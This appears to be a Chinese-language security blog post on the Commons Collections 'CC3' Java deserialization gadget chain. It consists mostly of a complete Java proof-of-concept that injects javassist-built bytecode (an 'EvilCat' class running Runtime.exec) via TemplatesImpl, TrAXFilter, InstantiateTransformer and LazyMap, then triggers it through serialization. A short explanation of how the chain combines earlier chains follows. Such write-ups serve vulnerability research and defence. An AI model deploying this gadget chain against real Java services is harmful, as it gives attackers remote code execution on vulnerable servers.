JDK版本:1.7 (8u71之后已修复不可利用)
    CommonsCollections 3.1

    直接给POC了,就是cc2+cc1

    1. package com.yq1ng.cc3;
    3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
    4. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
    5. import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
    6. import javassist.ClassClassPath;
    7. import javassist.ClassPool;
    8. import javassist.CtClass;
    9. import org.apache.commons.collections.Transformer;
    10. import org.apache.commons.collections.functors.ChainedTransformer;
    11. import org.apache.commons.collections.functors.ConstantTransformer;
    12. import org.apache.commons.collections.functors.InstantiateTransformer;
    13. import org.apache.commons.collections.functors.InvokerTransformer;
    14. import org.apache.commons.collections.map.LazyMap;
    16. import javax.xml.transform.Templates;
    17. import java.io.FileInputStream;
    18. import java.io.FileOutputStream;
    19. import java.io.ObjectInputStream;
    20. import java.io.ObjectOutputStream;
    21. import java.lang.reflect.Constructor;
    22. import java.lang.reflect.Field;
    23. import java.lang.reflect.InvocationHandler;
    24. import java.lang.reflect.Proxy;
    25. import java.util.HashMap;
    26. import java.util.Map;
    28. /**
    29.  * @author ying
    30.  * @Description
    31.  * @create 2021-11-23 13:47
    32.  */
    34. public class cc3 {
    35.     public static void main(String[] args) throws Exception {
    36.         ClassPool pool = ClassPool.getDefault();
    37.         pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
    38.         CtClass cc = pool.makeClass("Cat");
    39.         String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
    40.         cc.makeClassInitializer().insertBefore(cmd);
    41.         String randomClassName = "EvilCat" + System.nanoTime();
    42.         cc.setName(randomClassName);
    44.         cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));
    45.         byte[] classBytes = cc.toBytecode();
    46.         byte[][] targetByteCodes = new byte[][]{classBytes};
    48.         TemplatesImpl templates = TemplatesImpl.class.newInstance();
    49.         setFieldValue(templates, "_bytecodes", targetByteCodes);
    50.         setFieldValue(templates, "_name", "name");
    51.         setFieldValue(templates, "_class", null);
    53.         /*
    54.             这里new ConstantTransformer(TrAXFilter.class)返回TrAXFilter类,然后传给InstantiateTransformer
    55.             InstantiateTransformer在构造函数中实例化TrAXFilter类,然后又调用它的构造方法,进而调用newTransformer()方法
    56.         */
    57.         ChainedTransformer chain = new ChainedTransformer(new Transformer[] {
    58.                 new ConstantTransformer(TrAXFilter.class),
    59.                 new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})
    60.         });
    62.         //    触发InstantiateTransformer#transform()
    63.         HashMap innermap = new HashMap();
    64.         LazyMap map = (LazyMap)LazyMap.decorate(innermap,chain);
    67.         Constructor handler_constructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
    68.         handler_constructor.setAccessible(true);
    69.         InvocationHandler map_handler = (InvocationHandler) handler_constructor.newInstance(Override.class,map);
    70.         Map proxy_map = (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),new Class[]{Map.class},map_handler);
    73.         Constructor AnnotationInvocationHandler_Constructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class,Map.class);
    74.         AnnotationInvocationHandler_Constructor.setAccessible(true);
    75.         InvocationHandler handler = (InvocationHandler)AnnotationInvocationHandler_Constructor.newInstance(Override.class,proxy_map);
    77.         try{
    78.             ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc3"));
    79.             outputStream.writeObject(handler);
    80.             outputStream.close();
    82.             ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc3"));
    83.             inputStream.readObject();
    84.         }catch(Exception e){
    85.             e.printStackTrace();
    86.         }
    88.     }
    89.     public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
    90.         final Field field = getField(obj.getClass(), fieldName);
    91.         field.set(obj, value);
    92.     }
    94.     public static Field getField(final Class<?> clazz, final String fieldName) {
    95.         Field field = null;
    96.         try {
    97.             field = clazz.getDeclaredField(fieldName);
    98.             field.setAccessible(true);
    99.         }
    100.         catch (NoSuchFieldException ex) {
    101.             if (clazz.getSuperclass() != null)
    102.                 field = getField(clazz.getSuperclass(), fieldName);
    103.         }
    104.         return field;
    105.     }
    106. }

    先看com/sun/org/apache/xalan/internal/xsltc/trax/TrAXFilter.java
    image.png
    cc2可以知道,TemplatesImpl是可以加载任意字节码的,这个类先放着。
    来看 org/apache/commons/collections/functors/InstantiateTransformer.java,它的transform()又可以实例化任意类
    image.png
    transform()在cc1中是通过 LazyMap#get()触发的,cc2与cc1结合起来就达到从LazyMap到加载任意字节码的效果
    上面poc实现效果如下
    image.png